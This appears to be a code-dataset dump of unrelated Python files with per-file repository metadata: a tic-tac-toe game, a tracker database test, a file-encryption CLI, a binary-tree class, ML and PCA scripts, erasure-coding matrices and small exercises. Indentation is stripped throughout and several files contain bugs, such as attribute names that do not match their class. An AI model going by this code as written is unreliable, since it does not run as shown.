def win_sequence(list, marker):
return list == marker
def place_marker(board, marker, position):
board[position] = marker
def win_check(board, mark):
marker = [mark]*3
# check horizontal lines
for line_index in range(1, 10, 3):
win_list = board[line_index:line_index+3]
if win_sequence(win_list, marker):
return True
# check vertical lines
for line_index in range(1,4):
win_list = board[line_index:line_index+7:3]
if win_sequence(win_list, marker):
return True
# check diagonals
win_list = board[1:10:4]
if win_sequence(win_list, marker):
return True
win_list = board[3:8:2]
if win_sequence(win_list, marker):
return True
return False
def choose_first():
# 0 - player 1 goes first, 1 - player 2 goes first
return random.randint(0,1)
def space_check(board, position):
return board[position] == ' '
def full_board_check(board):
return (board.count('X') + board.count('O')) == 9
def player_choice(board):
position = None
while position not in [1, 2, 3, 4, 5, 6, 7, 8, 9] or not space_check(board, position):
position = int(input('Choose a position (1-9)'))
return position
def replay():
replay = input("Play again? (Y)").upper()
return replay == 'Y'
if __name__ == "__main__":
print('Welcome to Tic Tac Toe!')
while True:
# Set up the game
board = ['#'] + [' ']*9
# Player 1 choose either X or O
players = player_input()
# Who's turn first
turn = choose_first() # 0 player 1 1 player 2
print(f"Player {turn+1} goes first")
play_game = input('Ready to play (Y)? ').upper()
if play_game == 'Y':
game_on = True
else:
game_on = False
while game_on:
display_board(board)
for i in range (turn,2):
print(f"Your turn Player {i+1}")
position = player_choice(board)
if space_check(board, position):
place_marker(board, players[i], position)
display_board(board)
if win_check(board, players[i]):
if i:
print(f"Congratulations Player 2")
else:
print(f"Congratulations Player 1")
break
turn = 0
if full_board_check(board) or win_check(board, 'X') or win_check(board, 'O') :
break
if not replay():
break | true |
091824f44461290479800b6f5b33923bcfead9d0 | Python | LibriCerule/Cerulean_Tracking | /db_unittest.py | UTF-8 | 1,461 | 2.59375 | 3 | [
"MIT"
] | permissive | from tracker_database import TrackerDatabase
test_uuid = "de305d54-75b4-431b-adb2-eb6b9e546014"
test_uuid2 = "de305d54-75b4-431b-adb2-eb6b9e546015"
def test_track_new_package():
test_name = "4401 Wilson Blvd #810, Arlington, VA 22203"
test_lat = 0
test_lon = 0
test_delivered = False
test_time = "2015-12-08T08:42:33.188-25:00"
testdb = TrackerDatabase("unittest.db")
testdb.track_new_package(test_name, test_uuid, test_lat, test_lon)
testdb.track_new_package(test_name, test_uuid2, test_lat, test_lon)
testdb.package_track_update(test_uuid, test_lat, test_lon, test_time)
testdb.package_track_update(test_uuid2, test_lat, test_lon, test_time)
testdb.package_track_update(test_uuid, False)
a = testdb.get_package(test_uuid)
b = testdb.get_package_updates(test_uuid)
print(b)
print(",".join("{\"uuid\":%s, \"lat\":%s, \"lon\":%s, \"timestamp\":%s}" %(update[0], update[1], update[2], update[3]) for update in b))
#print(b)
def test_login():
testdb = TrackerDatabase("unittest.db")
testdb.register_user("hee", "hoo")
if testdb.log_in("hee", "hah"):
print("Login works!")
else:
print("Login failed")
testdb.register_package_to_user("hee", test_uuid)
testdb.register_package_to_user("hee", test_uuid2)
#print(testdb.get_package_of_user("admin"))
def main():
test_track_new_package()
test_login()
if __name__ == "__main__":
main()
| true |
ac9947fe8f632200c831439009a2610e6673dc1a | Python | ashutoshdhondkar/basic-python | /comprehension_exercise.py | UTF-8 | 498 | 4.3125 | 4 | [] | no_license | #Wap to check whether an input number is multiple of 5 and is greater than 17
'''
#without comprehension
ip=int(input("Enter a number : "))
if(ip%5==0) and (ip>17):
print("Satisfied")
else:
print("Not satisfied")
'''
# with comprehension
def check(num):
if(num%5==0 and num>17):
return True
else:
return False
lis=[10,15,20,17,30,18]
nl=[x for x in filter(lambda x: True if(x%5==0 and x>17) else False,lis)]
print(nl)
| true |
ef9c01c7d62edf3c170a2bfb2f79545e9fac4a22 | Python | minbbaevw/multi.plus.py | /main.py | UTF-8 | 1,375 | 4.34375 | 4 | [] | no_license | # Дан массив целых чисел. Нужно найти сумму элементов с четными индексами (0-й, 2-й, 4-й итд), затем перемножить эту сумму и последний элемент исходного массива. Не забудьте, что первый элемент массива имеет индекс 0.
# Для пустого массива результат всегда 0 (ноль).
# Входные данные: Список (list) целых чисел (int).
# Выходные данные: Число как целочисленное (int).
def multi_plus(array):
"""
sums even-indexes elements and multiply at the last
"""
if len(array) == 0:
return False
s = 0
for i in range(len(array)):
if i % 2 == 0:
s = s + array[i]
return s * array[-1]
#These "asserts" using only for self-checking and not necessary for auto-testing
if __name__ == '__main__':
print('Example:')
print(multi_plus([0, 1, 2, 3, 4, 5]))
assert multi_plus([0, 1, 2, 3, 4, 5]) == 30, "(0+2+4)*5=30"
assert multi_plus([1, 3, 5]) == 30, "(1+5)*5=30"
assert multi_plus([6]) == 36, "(6)*6=36"
assert multi_plus([]) == 0, "An empty array = 0"
print("Coding complete? Click 'Check' to review your tests and earn cool rewards!") | true |
2b1a6f8ddbeb857738b34659c2da131f3c627ce1 | Python | subicWang/leetcode_aotang | /tools/binarytree.py | UTF-8 | 3,592 | 3.5 | 4 | [] | no_license | # -*- coding: utf-8 -*-
"""
Aouther: Subic
Time: 2019/8/28: 10:08
"""
from collections import Iterable
import networkx as nx
import matplotlib.pyplot as plt
class Node(object):
def __init__(self, value, left=None, right=None):
self.val = value
self.left = left
self.right = right
class BinaryTree(object):
def __init__(self, seq=()):
assert isinstance(seq, Iterable)
self.root = None
self.seq = []
def _create_balance_binary_tree(self, *args):
if not args:
return
if not self.root:
self.root = Node(args[0])
args = args[1:]
for i in args:
seed = self.root
while True:
if i > seed.val:
if not seed.right:
node = Node(i)
seed.right = node
break
else:
seed = seed.right
else:
if not seed.left:
node = Node(i)
seed.left = node
break
else:
seed = seed.left
def level_order(self):
res = []
if self.root is None:
return res
q = [self.root]
while len(q):
r = q.pop(0)
if r.left:
q.append(r.left)
if r.right:
q.append(r.right)
res.append(r.value)
return res
def first_order(self, root):
if not root:
return None
self.seq.append(root.val)
self.first_order(root.left)
self.first_order(root.right)
def mid_order(self, root):
if not root:
return None
self.mid_order(root.left)
self.seq.append(root.val)
self.mid_order(root.right)
def last_order(self, root):
if not root:
return None
self.last_order(root.left)
self.last_order(root.right)
self.seq.append(root.val)
def create_level_tree(self, *args):
args = list(args)
if not args:
return None
if not self.root:
self.root = Node(args[0])
args = args[1:]
Nodes = [self.root]
while len(args) != 0:
r = Nodes.pop(0)
if r:
if r.left is None:
node = Node(args.pop(0))
r.left = node
Nodes.append(node)
if r.right is None:
node = Node(args.pop(0))
r.right = node
Nodes.append(node)
def create_graph(G, node, pos, x=0, y=0, layer=1):
pos[node.value] = (x, y)
if node.left:
G.add_edge(node.val, node.left.val)
l_x, l_y = x - 1/2 ** layer, y-1
l_layer = layer + 1
create_graph(G, node.left, pos, l_x, l_y, layer=l_layer)
if node.right:
G.add_edge(node.val, node.right.val)
r_x, r_y = x + 1/2 ** layer, y-1
r_layer = layer + 1
create_graph(G, node.right, pos, r_x, r_y, layer=r_layer)
return G, pos
def draw(node):
graph = nx.DiGraph()
graph, pos = create_graph(graph, node, pos={})
fig, ax = plt.subplots(figsize=(8, 8))
nx.draw_networkx(graph, pos, ax, node_size=500)
plt.show()
if __name__ == "__main__":
s = [10, 20, 30, 40, 50]
tree = BinaryTree()
tree.create_level_tree(*s)
draw(tree.root)
# tree.first_order(tree.root)
# print(tree.seq)
| true |
fa95b14cee4d49c0e64817a0e6c43c222f6fc9fb | Python | andreas19/pygemina | /src/gemina/__main__.py | UTF-8 | 3,156 | 2.84375 | 3 | [
"BSD-3-Clause"
] | permissive | # flake8: noqa
"""Usage:
gemina encrypt -i INFILE -o OUTFILE [-V N] (-p | -k) [INPUT]
gemina decrypt -i INFILE -o OUTFILE (-p | -k) [INPUT]
gemina verify -i INFILE (-p | -k) [INPUT]
gemina create -o OUTFILE [-V N]
Commands:
encrypt encrypt a file
decrypt decrypt a file
verify verify a file
create create a secret key
Argument:
INPUT password or keyfile
if omitted it will be asked for (password w/o echoing)
Options:
-i INFILE --input INFILE input file
-o OUTFILE --output OUTFILE output file
-V N format version (N: one of 1, 2, 3, 4) [default: 1]
-p --password use password
-k --keyfile use keyfile
-h --help show this help
--version show the version
"""
import sys
from getpass import getpass
from salmagundi.files import read_all, write_all
from salmagundi.utils import docopt_helper
from . import *
from . import __version__
def _version_conv(n):
n = int(n)
if n == 1:
return Version.V1
if n == 2:
return Version.V2
if n == 3:
return Version.V3
if n == 4:
return Version.V4
raise ValueError('version must be one of 1, 2, 3, 4')
def _get_input(passwd):
try:
in_put = getpass() if passwd else input('Keyfile: ')
if not in_put:
sys.exit('no input')
return in_put
except EOFError:
print()
sys.exit()
def main():
"""Main function."""
args = docopt_helper(__doc__, version=__version__,
converters={'-V': _version_conv})
try:
if args['create']:
write_all(args['--output'],
create_secret_key(version=args['-V']), True)
else:
if not args['INPUT']:
in_put = _get_input(args['--password'])
else:
in_put = args['INPUT']
indata = read_all(args['--input'], True)
if args['encrypt']:
if args['--password']:
outdata = encrypt_with_password(in_put.encode(),
indata, version=args['-V'])
else:
outdata = encrypt_with_key(read_all(in_put, True),
indata, version=args['-V'])
write_all(args['--output'], outdata, True)
elif args['decrypt']:
if args['--password']:
outdata = decrypt_with_password(in_put.encode(), indata)
else:
outdata = decrypt_with_key(read_all(in_put, True), indata)
write_all(args['--output'], outdata, True)
else: # verify
if args['--password']:
ok = verify_with_password(in_put.encode(), indata)
else:
ok = verify_with_key(read_all(in_put, True), indata)
if ok:
print('verified')
else:
sys.exit('NOT verified')
except KeyboardInterrupt:
print()
except Exception as ex:
sys.exit(ex)
if __name__ == '__main__':
main()
| true |
8ee17ccebc20de05c3e6e1b868ea89d7a4597738 | Python | dwtrain/Gitpractice | /calc.py | UTF-8 | 320 | 3.515625 | 4 | [] | no_license | def add(x,y):
return x+y
def sub(x,y):
return x-y
def mult(x,y):
return x*y
def divide(x,y):
if(y==0):
return NULL
else:
return x/y
def mod(x,n):
return x%n
print('these are math operations')
print(add(2,4))
print(sub(2,4))
print(mult(2,4))
print(divide(2,4))
print(mod(2,4))
| true |
108565a87cf38864a7ced4482f9753a2a9159475 | Python | 499244188/Python | /1datetime.py | UTF-8 | 1,448 | 3.625 | 4 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Wed Apr 13 14:06:18 2017
@author: Z
"""
from datetime import datetime
now = datetime.now()
print(now)
print(type(now))
#指定时间日期
dt = datetime(2017,5,4,23,1)
print(dt)
dt.timestamp()#把datatime转为timestamp
t = 3600*24*360*48-3600*24*11
print(datetime.fromtimestamp(t))
t = 1493910060.0
print(datetime.fromtimestamp(t))#本地时间
print(datetime.utcfromtimestamp(t))#UTC时间
#str转为datetime
cday = datetime.strptime('2015-6-1 18:19:59', '%Y-%m-%d %H:%M:%S')
print(cday)
#datetime转为str
now=datetime.now()
print(now.strftime('%A,%b %d %H:%M'))
#datetime 加减
from datetime import datetime,timedelta
now = datetime.now()
now+timedelta(hours=10)
now-timedelta(days = 19)
now + timedelta(days=2,hours=13)
#本地时间转UTC时间
from datetime import timezone
tz_utc_8 = timezone(timedelta(hours=8))
now = datetime.now()
dt = now.replace(tzinfo=tz_utc_8) #强制设置为UTC+8:00
#时区转换
#拿到utc时间,并强制设置时区为utc+0:00
utc_td = datetime.utcnow().replace(tzinfo=timezone.utc)
#astimezone()将时区转换为北京时间
bj_dt = utc_td.astimezone(timezone(timedelta(hours=8)))
print(bj_dt)
#astimezone 将时区转为东京时间:
tokyo_dt = utc_td.astimezone(timezone(timedelta(hours=9)))
print(tokyo_dt)
#astimezone() 将北京时区换位东京时间
tokyo_dt2 = bj_dt.astimezone(timezone(timedelta(hours=9)))
| true |
58b8f72c633407e708f248f6cc3d1fd931d7540c | Python | Dharian/pythonProject | /Ejercicios/Listas/Ejercicio 9 LIstas.py | UTF-8 | 404 | 3.796875 | 4 | [
"MIT"
] | permissive | def cargarLista():
lista=[]
for x in range(5):
lista.append(str(input("Ingresa tus cinco palabras favoritas")))
print(lista[x])
comprobarLongitud(lista)
def comprobarLongitud(lista):
for elemento in lista:
if len(elemento) > 5:
print(elemento)
else:
print("la palabra ", elemento, " no tiene más de cinco caracteres")
cargarLista()
| true |
7b6c0519f2e32876ba7e16973eb7f88672eed47a | Python | sekunder/SWDB-KART | /pca/main.py | UTF-8 | 1,344 | 3.328125 | 3 | [] | no_license | from sklearn.preprocessing import StandardScaler
import numpy as np
def pca(X, ndims=3):
"""Runs PCA on provided data, X, and returns the projection onto ndims principal components.
This function assumes X has data series in columns.
This function also returns the covariance matrix of the data (scaled to zero norm and unit variance), as well as the eigen vectors and values of that matrix.
Input:
X : ndarray with data series in columns (e.g. one neuron's calcium trace (or DF/F) per column)
ndims : the number of dimensions to project down to. Default is 3 for fancy 3d scatter plots.
Output:
Y : Projected, scaled data.
cov_mat : Covariance matrix of the scaled data
eig_pairs : a list of tuples. Each tuple is of the form (eigen value, eigen vector), and they are sorted high to low"""
original_dims = X.shape[1];
if ndims > original_dims:
ndims = original_dims
#TODO Check what this scaler is actually doing; it might be scaling columns independently
X_std = StandardScaler().fit_transform(X)
cov_mat = np.cov(X.T)
eig_vals, eig_vecs = np.linalg.eig(cov_mat)
eig_pairs = [(np.abs(eig_vals[i]), eig_vecs[:, i]) for i in range(len(eig_vals))]
eig_pairs.sort(key=lambda x: x[0], reverse=True)
W = np.hstack((eig_pairs[i][1].reshape(original_dims,1) for i in range(ndims)))
Y = X_std.dot(W)
return Y, cov_mat, eig_pairs
| true |
45fdf75a9b30b797f1090d38a62c184c9e204a3d | Python | BartlomiejCiurus/PythonClasses | /Functions/4.2.py | UTF-8 | 841 | 3.65625 | 4 | [] | no_license | __author__ = 'Bartek'
def print_ruler(number):
ruler = ""
limiter = " "
counter = 0
border_value = 10
for i in range(1, number):
ruler += "|...."
ruler += "|\n"
for character in ruler:
if character == '|':
ruler += str(counter)
counter += 1
if counter >= border_value:
border_value *= 10
limiter = limiter[:(len(limiter) - 1)]
ruler += limiter
return ruler
def print_rectangle(width, height):
horizontal_line = "+---" * width + "+\n"
vertical_line = "| " * width + "|\n"
result = ""
for counter in range(0, height * 2):
if counter % 2 == 0:
result += horizontal_line
else:
result += vertical_line
result += horizontal_line
return result
| true |
b3ec75f76aa090dab2d5fd8237b9d7ffc6b981f9 | Python | gdurin/Python-in-the-lab | /problems/plot3D_withcolors.py | UTF-8 | 580 | 2.765625 | 3 | [
"CC-BY-3.0"
] | permissive | import numpy as np
import pandas as pd
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
from matplotlib import colors as mcolors
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
data = pd.read_csv("output_point.csv", names=['x','y','z','R','G','B'])
c = [mcolors.to_hex([r/255,g/255,b/255]) for r,g,b in zip(data.R, data.G, data.B)]
# ax.scatter(data.x, data.y, data.z, 'o', c=c)
data = np.random.random((500,6))
c = [mcolors.to_hex([r,g,b]) for r,g,b in data[:,3:]]
ax.scatter(data[:,0], data[:,1], data[:,2], 'o', c=c, s=25)
plt.show()
| true |
c690610208b79cb822ddbf41ce7fd9a407d8b00c | Python | haribogummi/test | /anotation1.py | UTF-8 | 907 | 2.578125 | 3 | [] | no_license | # coding: UTF-8
import re
import sys
import csv
def position():
dic1={}
dic2={}
f=open("snp_test.csv","rb")
datareader = csv.reader(f)
for row in datareader:
dic2={row[1]:row[2]}
dic1.update(dic2)
return dic1
f.close()
def search():
dic1=position()
c=0
print "Position,Nuc,n_p,Start,End,Type"
for k,v in dic1.iteritems():
f=open("gfftest.gff","r")
lines = f.readlines()
for line in lines:
if re.match("#",line) == None:
line=line.rstrip("\n")
line=line.split("\t")
result=()
if int(k) >= int(line[3]) and int(k) <= int(line[4]):
print k+","+v+","+line[5]+","+line[3]+","+line[4]+","+line[2]
##問題点 +-がででこない(表記の問題?) chromeson を書き出さない条件分布ないしgene,sRNAなどのTypeをまとめる方法が必要
# f.close()
##---------------------------------##
if __name__ == '__main__':
position()
search()
| true |
47a53542ffae6efd469c633154fe5af425a87af9 | Python | baez97/shonen | /Source Code/Estado.py | UTF-8 | 1,877 | 3.109375 | 3 | [] | no_license | import pygame
from pygame.locals import *
class Estado:
def pintar(self, personaje):
self.grafico.pintar(personaje)
def getImage(self):
return self.image
def isUp(self):
return False
def isDown(self):
return False
def isRight(self):
return False
def isLeft(self):
return False
class Parado(Estado):
def __init__(self, personaje):
self.image = pygame.image.load(personaje.imagenes['parado'])
self.grafico = personaje.getGrafico().parado
def avanza(self, personaje):
pass
"""class MovingRight(Estado):
def avanza(self, grafico):
new_pos_x = self.pos_x + 5
if new_pos_x + 120 < 600:
self.pos_x = new_pos_x
self.currentImage = grafico.right
self.img_rect = self.img_rect.move((5, 0))
else
self.currentImage = grafico.parado"""
class MovingLeft(Estado):
def __init__(self, personaje):
self.image = pygame.image.load(personaje.imagenes['left'])
def avanza(self, personaje):
personaje.moveLeft()
def isLeft(self):
return True
class MovingRight(Estado):
def __init__(self, personaje):
self.image = pygame.image.load(personaje.imagenes['right'])
def avanza(self, personaje):
personaje.moveRight()
def isRight(self):
return True
class MovingUp(Estado):
def __init__(self, personaje):
self.image = pygame.image.load(personaje.imagenes['up'])
def avanza(self, personaje):
personaje.moveUp()
def isUp(self):
return True
class MovingDown(Estado):
def __init__(self, personaje):
self.image = pygame.image.load(personaje.imagenes['down'])
def avanza(self, personaje):
personaje.moveDown()
def isDown(self):
return True
| true |
8e5f4d6addb9f956efb0907c36dd4f69e8f12635 | Python | yellowrangler/vue | /systemscripts/putvue.py | UTF-8 | 811 | 2.96875 | 3 | [] | no_license | #!/usr/bin/env python
#!/usr/bin/env python3
import sys
import subprocess
import glob
# global variables
mysqlcommand = "mysql -u tarryc -p vue < "
file_list = []
cmd = "no file selected"
file_list = glob.glob('vue-*python.sql')
l = len(file_list)
i = 0
while (i < l):
name = file_list[i]
print name
answer = raw_input('Do you want to use this file to update vue database (yes/no) ?')
Fl = answer[0].lower()
if Fl == 'y':
cmd = mysqlcommand + name
break;
i += 1
print "The following command will now be run, ok? (yes/no)"
print cmd
answer = raw_input('Do you want to use this file to update vue database (yes/no) ?')
Fl = answer[0].lower()
if Fl == 'y':
returned_value = subprocess.call(cmd, shell=True) # returns the exit code in unix
print'returned value:', returned_value
quit() | true |
5c89f0b24ef920a2fa5c9b2cbd372881868bbb1f | Python | yeasin50/Traffic-Sign-Classification | /traffic_sign_net.py | UTF-8 | 3,371 | 2.765625 | 3 | [] | no_license | #!/usr/bin/env python
# coding: utf-8
# # <center> TrafficSignNet
# Conv2D
# input: (None, 32, 32, 3)
# output: (None, 32, 32, 8)
#
# Activation
# input: (None, 32,32,8)
# output: (None, 32,32,8)
#
# BatchNormalization
# input: (None, 32, 32, 8)
# output: (None, 32, 32, 8)
#
# MaxPooling2D
# input: (None, 32, 32, 8)
# output: (None, 16, 16, 8)
#
# In[2]:
#necessary packages
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import BatchNormalization
from tensorflow.keras.layers import Conv2D
from tensorflow.keras.layers import MaxPooling2D
from tensorflow.keras.layers import Activation
from tensorflow.keras.layers import Dense
from tensorflow.keras.layers import Flatten
from tensorflow.keras.layers import Dropout
# In[3]:
class TrafficSignNet:
def build(width, height, channel, classes):
#init model
model = Sequential()
inputShape = (height, width, channel)
chanDim = -1
# if we are using "channels first", update the input shape and channels dimension
if backend.image_data_format()== "channels_first":
inputShape =(channel , height, width)
chanDim = 1
print("got: rev onn backend")
# CONV => RELU => BN => POOL
model.add(Conv2D(8, (5, 5), padding="same", input_shape= inputShape))
# 5×5 kernel to learn larger features
# distinguish between different traffic sign shapes and color blobs
model.add(Activation("relu"))
model.add(BatchNormalization(axis= chanDim))
model.add(MaxPooling2D(pool_size=(2, 2)))
#(CONV => RELU => CONV => RELU) * 2 => POOL layers:
model.add(Conv2D(16, (3, 3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis= chanDim))
model.add(Conv2D(16, (3, 3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis= chanDim))
model.add(MaxPooling2D(pool_size=(2, 2)))
# second set of (CONV => RELU => CONV => RELU) * 2 => POOL
model.add(Conv2D(32, (3, 3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis= chanDim))
model.add(Conv2D(32, (3, 3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=chanDim))
model.add(MaxPooling2D(pool_size=(2, 2)))
#The head of our network consists of two sets of fully connected layers and a softmax classifier
# first set of FC => RELU layers
model.add(Flatten())
model.add(Dense(128))
model.add(Activation("relu"))
model.add(BatchNormalization(axis= chanDIm))
model.add(Dropout(0.5))
# second set of FC => RELU layers
model.add(Flatten())
model.add(Dense(128))
model.add(Activation("relu"))
model.add(BatchNormalization(axis= chanDIm))
model.add(Dropout(0.5))
# softmax classifier
model.add(Dense(classes))
model.add(Activation("softmax"))
return model
## if you cant get this model goto https://github.com/yeasin50/startUP_CNN
# In[ ]:
| true |
098f3382a214dd08406eae9310623053599fd72a | Python | pheldox/Covid-19-Tweet-Classification | /app.py | UTF-8 | 2,293 | 3.0625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Mon Jul 6 21:37:09 2020
@author: Ayush
"""
# covid 19 tweets
import streamlit as st
import pickle
import numpy as np
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
from nltk.stem import WordNetLemmatizer
from PIL import Image
import re
def main():
html_temp = """
<div style="background-color:blue;padding:10px">
<h2 style="color:black;text-align:center;">Covid-19 Related Tweets Classification System</h2>
</div>
"""
st.markdown(html_temp , unsafe_allow_html= True)
image = Image.open('h1.jpeg')
st.image(image, use_column_width=True,format='PNG')
ps = PorterStemmer()
model = pickle.load(open('covid.pkl', 'rb'))
vec = pickle.load(open('vec.pkl', 'rb'))
def clean_text(text):
text = re.sub(pattern='[^a-zA-Z]', repl=' ', string=text)
text = text.lower()
#text = text.split()
#words = [word for word in words if word not in set(stopwords.words('english'))]
#words = [ps.stem(word) for word in words]
#text = ' '.join(text)
return text
st.markdown("<body style = 'background-color: white;'><h3 style = 'text-align: center; color :black;'> Enter the text to know weather Tweet is Covid-19 Related or Not </h3></body>", unsafe_allow_html = True)
text = st.text_input(" ", ' ')
text = clean_text(text)
if st.button('Predict'):
text_vec = vec.transform([text])
pred= model.predict(text_vec)
if pred== 0:
st.error('Not Covid-19 Related Tweets')
else:
st.info('Hey!! This Tweet is Related to Covid-19')
st.balloons()
#st.success('{}'.format(pred))
if st.button("Lets Get in Touch"):
st.text("Stay Home 💦 Stay Safe.")
st.text("Github link: https://github.com/ayushkesh/Covid-19-Tweet-Classification")
html_temp1 = """
<div style="background-color:blue">
<p style="color:white;text-align:center;"><b>Made with ❤️ by Ayush Kumar</b> </p>
</div>
"""
st.markdown(html_temp1,unsafe_allow_html=True)
if __name__ =='__main__':
main()
| true |
28803ddbabe66f9294d4cfb1e2780e5418ff49c4 | Python | kevjam/fake-news-classifier | /src/predict.py | UTF-8 | 2,428 | 2.625 | 3 | [] | no_license | from preprocess import filter_dataset
from utils.tokenizing import segment_zh_data, tokenize
from utils.storage import load_tokenizers
# -------------- General Packages --------------
# Data Manipulation
import pandas as pd
import numpy as np
# For Saving/Loading Files
import os
from keras.models import load_model
# For parsing command-line arguments
import argparse
# Prepare a dataset for preprocessing, returns ids and a preprocessed dataframe
def prepare(df, t_EN, t_ZH, EN_SENTENCE_SIZE=22, ZH_SENTENCE_SIZE=16):
df = filter_dataset(df, drop_columns=['tid1','tid2'], label_exists=False)
ids = df['id']
df = segment_zh_data(df.drop(columns=['id']))
df = tokenize(t_EN,t_ZH,df,EN_SENTENCE_SIZE,ZH_SENTENCE_SIZE,label_exists=False)
return ids,df
# Get predictions on a model
def get_predictions(df, model, EN_SENTENCE_SIZE=22, ZH_SENTENCE_SIZE=16):
class_predictions = model.predict([df.iloc[:,:EN_SENTENCE_SIZE*2],df.iloc[:,EN_SENTENCE_SIZE*2:]])
label_predictions = np.argmax(class_predictions, axis=1)
return label_predictions
if __name__== "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-m','--modeldir', help='Directory of the model to obtain metrics for', default='./best_model/BiLSTM.hdf5', type=str)
parser.add_argument('-i','--inputcsv', help='Directory for the input csv', default='./data/test.csv', type=str)
parser.add_argument('-o','--outputcsv', help='Directory for the output csv', default='./data/submission.csv', type=str)
args = parser.parse_args()
# Directories
MODEL_DIR = args.modeldir
TOKENIZER_DIR = './tokenizers/'
INPUT_CSV = args.inputcsv
# Load the necessary files
t_EN,t_ZH = load_tokenizers(TOKENIZER_DIR)
df = pd.read_csv(INPUT_CSV,encoding='utf-8-sig',error_bad_lines=False)
model = load_model(MODEL_DIR, compile=False)
# Prepare data for preprocessing and return ids/clean data
ids,df = prepare(df,t_EN,t_ZH)
# Get predictions of the dataset
label_predictions = get_predictions(df,model)
df_predictions = pd.DataFrame({'id':ids, 'label':label_predictions})
# Unencode the labels
map_dict = {0: 'unrelated', 1:'agreed', 2:'disagreed'}
df_predictions['label'] = df_predictions["label"].map(map_dict)
# Save predictions to a CSV
df_predictions.to_csv(args.outputcsv, index=False) | true |
08c7a5a38bf556feb2270064acae6082b1251ea3 | Python | junli-cs-fiu/spinner_public | /matrix.py | UTF-8 | 1,224 | 2.984375 | 3 | [] | no_license | import numpy as np
def Cauchy(m, n):
x = np.array(xrange(n + 1, n + m + 1))
y = np.array(xrange(1, n + 1))
x = x.reshape((-1, 1))
diff_matrix = x - y
cauchym = 1.0 / diff_matrix
return cauchym
def RS(n, k):
I = np.identity(k)
P = Cauchy(n - k, k)
return np.concatenate((I, P), axis = 0)
def RS_plus(n, k, N):
G = RS(n, k)
Ge = np.zeros((n * N, k * N))
for i in xrange(k * N):
Ge[i, i] = 1
for i in xrange(k, n):
for j in xrange(k):
for l in xrange(N):
Ge[i * N + l, j * N + l] = G[i, j]
return (Ge, list(xrange(0, k * N)))
def Global_RS(n, k, N):
G = RS(n * N, k * N)
return (G, list(xrange(0, k * N)))
def Carousel(n, k, W):
N = sum(W)
K = map(lambda x: x * k, W)
R = [0] * n
for i in xrange(1, n):
R[i] = (R[i - 1] + K[i - 1]) % N
Ge = RS_plus(n, k, N)[0]
index = [0] * (k * N)
count = 0
for i in xrange(n):
for j in xrange(K[i]):
index[count] = i * N + (R[i] + j) % N
count += 1
Ge = np.linalg.solve(Ge[index].T, Ge.T)
Ge = Ge.T
return (Ge, index)
if __name__ == "__main__":
print Cauchy(4,3)
print RS(5, 4)
| true |
92197a7af9b0cd9ba5a036f49b23cae7b1b182d4 | Python | jobafash/InterviewPrep | /educative.io/patterns/bfs/easy4.py | UTF-8 | 2,272 | 4.65625 | 5 | [] | no_license | '''
Given a binary tree, populate an array to represent the averages of all of its levels.
Solution#
This problem follows the Binary Tree Level Order Traversal pattern. We can follow the same BFS approach. The only difference will be that instead of keeping track of all nodes of a level, we will only track the running sum of the values of all nodes in each level. In the end, we will append the average of the current level to the result array.
'''
from collections import deque
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
def find_level_averages(root):
result = []
if root is None:
return result
queue = deque()
queue.append(root)
while queue:
levelSize = len(queue)
levelSum = 0.0
for _ in range(levelSize):
currentNode = queue.popleft()
# add the node's value to the running sum
levelSum += currentNode.val
# insert the children of current node to the queue
if currentNode.left:
queue.append(currentNode.left)
if currentNode.right:
queue.append(currentNode.right)
# append the current level's average to the result array
result.append(levelSum / levelSize)
return result
def main():
root = TreeNode(12)
root.left = TreeNode(7)
root.right = TreeNode(1)
root.left.left = TreeNode(9)
root.left.right = TreeNode(2)
root.right.left = TreeNode(10)
root.right.right = TreeNode(5)
print("Level averages are: " + str(find_level_averages(root)))
main()
'''
Time complexity#
The time complexity of the above algorithm is O(N)O(N)O(N), where ‘N’ is the total number of nodes in the tree. This is due to the fact that we traverse each node once.
Space complexity#
The space complexity of the above algorithm will be O(N)O(N)O(N) which is required for the queue. Since we can have a maximum of N/2N/2N/2 nodes at any level (this could happen only at the lowest level), therefore we will need O(N)O(N)O(N) space to store them in the queue.
Similar Problems#
Problem 1: Find the largest value on each level of a binary tree.
Solution: We will follow a similar approach, but instead of having a running sum we will track the maximum value of each level.
maxValue = max(maxValue, currentNode.val)
''' | true |
9b043b127f870220d33161f7b1a1cc229fd10b19 | Python | tcbrouwer/FourierMonitor | /HarmonicAI/main.py | UTF-8 | 384 | 2.9375 | 3 | [] | no_license | import random
import math
from FourierClerk import FourierClerk
clerk = FourierClerk(1000)
supervisor = FourierClerk(10)
print(clerk.get_coefficients_for_channel(0))
for i in range(0,2000):
clerk.note([math.sin(math.pi * i/10)])
#clerk.note([random.random()])
supervisor.note(clerk.get_coefficients_for_channel(0))
print(supervisor.get_coefficients_for_channel(0))
| true |
8c88611626c37a22dc1ca4ca4d76db530a61d8fe | Python | ProximaB/Control-of-a-mobile-robot-with-extrinsic-feedback | /Find_Detect_base/qt6clock.py | UTF-8 | 1,077 | 2.71875 | 3 | [] | no_license | import cv2
def start_webcam(self):
if not self.cameraRuns:
self.capture = cv2.VideoCapture(cv2.CAP_DSHOW)
self.cameraRuns = not self.cameraRuns
self.timer = QTimer(self)
self.timer.timeout.connect(self.update_frame)
self.timer.start(2)
from PyQt5.QtCore import QTime, QTimer
from PyQt5.QtWidgets import QApplication, QLCDNumber
class DigitalClock(QLCDNumber):
def __init__(self, parent=None):
super(DigitalClock, self).__init__(parent)
self.setSegmentStyle(QLCDNumber.Filled)
timer = QTimer(self)
timer.timeout.connect(self.showTime)
timer.start(1000)
self.showTime()
self.setWindowTitle("Digital Clock")
self.resize(150, 60)
def showTime(self):
time = QTime.currentTime()
text = time.toString('hh:mm')
if (time.second() % 2) == 0:
text = text[:2] + ' ' + text[3:]
self.display(text)
import sys
app = QApplication(sys.argv)
clock = DigitalClock()
clock.show()
sys.exit(app.exec_()) | true |
